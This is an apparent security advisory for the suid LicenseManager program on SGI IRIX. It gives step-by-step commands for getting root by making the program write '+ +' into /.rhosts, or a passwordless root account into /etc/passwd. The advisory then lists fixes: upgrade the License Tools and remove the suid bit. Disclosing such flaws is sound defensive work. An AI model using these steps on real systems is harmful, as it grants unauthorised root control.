/usr/etc/LicenseManager (FLEXlm licence subsytem)


    IRIX 5.3, IRIX 6.0


    The purpose of the  LicenseManager program and the  FLEXlm license
    subsystem is for software licensing.  An account on the vulnerable
    system  is  required   for  exploit.    With  an  account,   these
    vulnerabilities are exploitable by  both local and remote  access.
    A new, fast, reliable way to  get root on your local SGI  is given
    below.    It   works   on    Irix   5.3,   6.2   and   6.3    with
    license_eoe.sw.license_eoe  installed.   IRIX     doesn't seem  to
    have it.

    This exploit  was made  possible by  developers who  make big, fat
    programs like LicenseManager suid.

    LicenseManager  is  GUI  to  license  subsystem.   It  allows   to
    install/remove/update  FLEXlm  and  NET_LS  licenses.  Any regular
    user with access to X screen can  run it, and it's suid.  It  will
    allow  anyone  to  install  licenses,  and  will  prompt  for root
    password  if  one  wants  to  remove  one.   And  that's about all
    protection it has.

        % setenv NETLS_LICENSE_FILE /.rhosts
        % /usr/etc/LicenseManager &

        NetLS Node-locked
        Vendor Name: whatever
        Vendor ID: + +
        Product name: whatever
        License version: 1.000
        License version:
        Expiration date: 01-jan-0

        (in license version field You can put space)


        License(s) succesfully installed

        % cat /.rhosts
        #:# "whatever" "whatever" "1.000" "Incomplete"
        + +

    If  your  system  has  remote  root  logins  disabled,   replacing
    /.rhosts with  /etc/passwd and  + +  with toor:0:0::/:/bin/sh will
    be helpful.  Credit fot this goes to Yuri Volobuev.


    The solution to this problem is to install version 3.0 of the  the
    License Tools, license_eoe subsystem.  To determine the version of
    License  Tools  installed  on  a  particular system, the following
    command can be used:

        % versions license_eoe


        chmod -s /usr/etc/LicenseManager


        get new release that fixes this problem.